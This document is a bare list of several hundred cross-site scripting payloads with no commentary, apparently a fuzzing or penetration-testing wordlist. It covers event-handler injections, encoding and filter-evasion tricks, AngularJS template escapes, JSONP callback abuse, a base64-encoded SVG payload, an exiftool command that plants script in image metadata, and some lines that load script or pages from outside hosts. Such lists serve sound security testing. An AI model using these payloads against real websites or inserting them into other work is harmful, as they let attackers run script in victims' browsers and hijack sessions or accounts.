dhcp1234
%3Cdhcp1234%3E
%3CScRiPt%3Edhcp1234%3C%2FScRiPt%3E
%3CImG+sRc%3D1+OnErRoR%3Ddhcp1234%3E
<ImG sRc=1 OnErRoR=prompt(1)>
<img/src/onerror=window.onerror=eval;throw'=alert\x281\x29'>
<svg><onload=alert(1)>
"><svg onload=alert(1)>
<svg><discard onbegin=alert(1)>
<style>@keyframes x{}</style>
<b style="animation-name:x" onanimationstart="alert(1)"></b>
<x id=x style="transition:color 1s" ontransitionend=alert(1)>
<x id=x style="transition transform 10s" ontransitioncancel=alert(1)>
<input onfocus=alert(1) id=x>
<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x>
<iframe id=x onfocus=alert(1)>
<embed id=x onfocus=alert(1) type=text/html>
<object id=x onfocus=alert(1) type=text/html>
<iframe id=x onblur=alert(1)></iframe><input autofocus>
<input onblur=alert(1) id=x><input autofocus>
<textarea onblur=alert(1) id=x></textarea><input autofocus>
<button onblur=alert(1) id=x></button><input autofocus>
<select onblur=alert(1) id=x></select><input autofocus>
<a onfocus=alert(1) id=x href>
<xss onfocus=alert(1) id=x tabindex=1>
<xss onblur=alert(1) id=x tabindex=1><input autofocus>
<link onfocus=alert(1) id=x tabindex=1 style=display:block>
<a onfocusin=alert(1) id=x tabindex=1>
<xss onfocusin=alert(1) id=x tabindex=1>
<xss onfocusout="alert(1)" id="x" tabindex="1"><input autofocus>
<a onactivate=alert(1) id=x tabindex=1>
<div onactivate=alert(1) id=x tabindex=1>
<xss onactivate=alert(1) id=x tabindex=1>
<a onbeforeactivate=alert(1) id=x tabindex=1>
<a ondeactivate=alert(1) id=x tabindex=1></a><input id=y autofocus>
<xss ondeactivate=alert(1) id=x tabindex=1></xss><input id=y autofocus>
<a onbeforedeactivate=alert(1) id=x tabindex=1></a><input id=y autofocus>
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //
javascript:alert(1)
'-alert(1)-'
'/alert(1)//
\'/alert(1)//
</script><svg onload=alert(1)>
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
/alert(1)//\
/alert(1)}//\
${alert(1)}
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
q=<script/&q=/src=data:&q=alert(1)>
"><svg onload=alert(1)>.gif
$ exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
[clickme](javascript:alert`1`)
<script src=data:,alert(1)>
<script src=//1>
<iframe src=1 onload="frames[0].postMessage('INJECTION','*')">
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>
<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="dhcp1234"/>
{{$new.constructor('alert(1)')()}}
<x ng-app>{{$new.constructor('alert(1)')()}}
<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y
1<svg onload=alert(1)>
1"><svg onload=alert(1)>
<<!--%23set var="x" value="svg onload=alert(1)"--><!--%23echo var="x"-->>
'1<svg onload=alert(1)>
<svg onload=alert(1)>\
//DOMAIN/PATH/;<svg onload=alert(1)>
//DOMAIN/PATH/;"><svg onload=alert(1)>
';alert(1);var myObj='
';alert(1);function myFunc(){}'
<html data-toggle=tab href="<img src=x onerror=alert(1)>">
<Svg OnLoad=alert(1)>
<Script>alert(1)</Script>
<svg onload=alert(1)//
<svg onload="alert(1)"
<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
<script/x>alert(1)</script>
%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
alert`1`
setTimeout`alert\x281\x29`
setInterval`alert\x281\x29`
[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']
('\141\154\145\162\164\50\61\51')()
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)
write`XSSed!`
write`<img/src/o&#78error=alert&lpar;1)>`
write('\74img/src/o\156error\75alert\501\51\76')
top.open`javas\cript:al\ert\x281\x29`
top.open`javas\cript:al\ert\x281\x29${0}0`
<svg onload=eval(" ' "+'dhcp1234')>
<svg id=eval onload=top[id](" ' "+'dhcp1234')>
"onpointerover=alert(1) //
"autofocus onfocusin=alert(1) //
"o<x>nmouseover=alert<x>(1)//
"autof<x>ocus o<x>nfocus=alert<x>(1)//
GIF89a=//<script>
alert(1)//</script>;
eval(URL.slice(-8)) #alert(1)
eval(location.hash.slice(1)) #alert(1)
document.write(decodeURI(location.hash)) #<img/src/onerror=alert(1)>
<svg/onload&equals;alert(1)>
<scrpt>confirm(1)</scrpt>
http://facebook.com.localhost/crosspwn.html?target=//brutelogic.com.br/tests/
status.html&msg=<script>alert(1)</script>
<script src=//www.google.com/complete/search?client=chrome%26jsonp=alert(1)></script>
<script src=//www.googleapis.com/customsearch/v1?callback=alert(1)></script>
<script src=//dhcp1234>
</script><x ng-app ng-csp>{{$new.constructor('alert(1)')()}}
<svg><set onbegin=alert(1)>
<svg><set end=1 onend=alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href
to=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href
values=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href to=0
from=javascript:alert(1)>
<svg><use xlink:href=data:image/svg%2Bxml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x>
<script>alert(1)</script>
<script src=data:,alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x onauxclick=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmouseenter=alert(1)>hover this
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
<x onpointercancel=alert(1)>hover this!
<x onpointerdown=alert(1)>hover this!
<x onpointerenter=alert(1)>hover this!
<x onpointerleave=alert(1)>hover this!
<x onpointermove=alert(1)>hover this!
<x onpointerout=alert(1)>hover this!
<x onpointerover=alert(1)>hover this!
<x onpointerup=alert(1)>hover this!
<x onpointerrawupdate=alert(1)>hover this!
">'-alert(1)-'<svg>
">&#39-alert(1)-&#39<svg>
">alert(1)-"<svg>
"&#34>alert(1)-&#34<svg>
<svg/on<script><script>load=alert(1)//</script>
<!--
%0A-->
%CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)>
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
"><svg/onload=alert(1)>"@x.y
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
javascript://https://DHCP1234.com/%250A1?alert(1):0
\74svg o\156load\75alert\501\51\76
<_:script xmlns:_="http://www.w3.org/1999/xhtml">alert(1)</_:script>
"'>confirm&lpar;1)</Script><Svg><Script/1='
javas&#99ript:1
javascript&colon;1
javascript&#9:1
&#1javascript:1
"javas%0Dcript:1"
%00javascript:1
{{$new.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}
&#123&#123$new.constructor('alert(1)')()&#125&#125
<x ng-init=a='alert(1)'>{{$new.constructor(a)()}}
<!--><svg onload=alert(1)-->
<x onafterscriptexecute=alert(1)>
<x onbeforescriptexecute=alert(1)>
<x onanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onanimationstart=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationstart=alert(1)><style>x{animation:s}@keyframes s{}
<x ontransitionend=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitionrun=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitionstart=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitioncancel=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<iframe src="//brutelogic.com.br/xss.php?a=<svg onload=alert(document.domain)>"style=display:none></iframe>
documentElement.innerHTML='<h1>dhcp1234</h1>'
</Script/"'--><Body /Autofocus /OnFocus = confirm`1` <!-->
PC9TY3JpcHQvIictLT48Qm9keSAvQXV0b2ZvY3VzIC9PbkZvY3VzID0gY29uZmlybWAxYCA8IS0tPg==
<base href=//dhcp1234>
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<body onorientationchange=alert(1)>
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><meta content=URL;%23 http-equiv=refresh>
<body onscroll=alert(1) style=overflow:auto;height:1000px id=x>#x
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1!
<marquee onstart=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<video ontimeupdate=alert(1) controls src=//brutelogic.com.br/x.mp4>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
<object onerror=alert(1)>
setInterval(x=>{b=document.body.style,b.marginTop=(b.marginTop=='4px')?'-4px':'4px';},5)
<j/onmouseover=location=innerHTML>javascript:alert(1)//
<iframe id=t:alert(1) name=javascrip onload=location=name+id>
`-alert(1)<javascript:`/
onmouseover=location=tagName+previousSibling.nodeValue>dhcp1234!
`-alert(1)<javas/
onmouseover=location=tagName+innerHTML+previousSibling.nodeValue>cript:`dhcp1234!
<alert(1)<!--/onmouseover=location=innerHTML+outerHTML>javascript:1/*dhcp1234!*/
</alert(1)<!-->
<j/1="*/""-alert(1)<!--/onmouseover=location=innerHTML+outerHTML>
javascript:/*dhcp1234!
*/"<j/1=/alert(1)//onmouseover=location=innerHTML+
previousSibling.nodeValue+outerHTML>javascript:/*dhcp1234!
<svg id=?[P]=<svg/onload=alert(1)+ onload=location=id>
<j/onmouseover=location=textContent>?[P]=<svg/onload=alert(1)>dhcp1234!</j>
<j/onmouseover=location+=textContent>&[P]=<svg/onload=alert(1)>dhcp1234!</j>
<j&[P]=<svg+onload=alert(1)/onmouseover=location+=outerHTML>dhcp1234!
</j&[P]=<svg+onload=alert(1)>
&[P]=<svg/onload=alert(1)><j/
onmouseover=location+=document.body.textContent>dhcp1234!</j>
${alert(1)}<javascript:`//onmouseover=location=tagName+URL>dhcp1234!
${alert(1)}<j/onmouseover=location=innerHTML+URL>javascript:`//dhcp1234!
${alert(1)}<javas/onmouseover=location=tagName+innerHTML+URL>cript:`//dhcp1234!
${alert(1)}`<javascript:`//
onmouseover=location=tagName+previousSibling.nodeValue>dhcp1234!
${alert(1)}`<javas/
onmouseover=location=tagName+innerHTML+previousSibling.nodeValue>cript:`dhcp1234!
<svg id=<img/src/onerror&#61alert(1)> onload=head.innerHTML=id>
<svg id=<img/src/onerror&#61alert(1)> onload=body.outerHTML=id>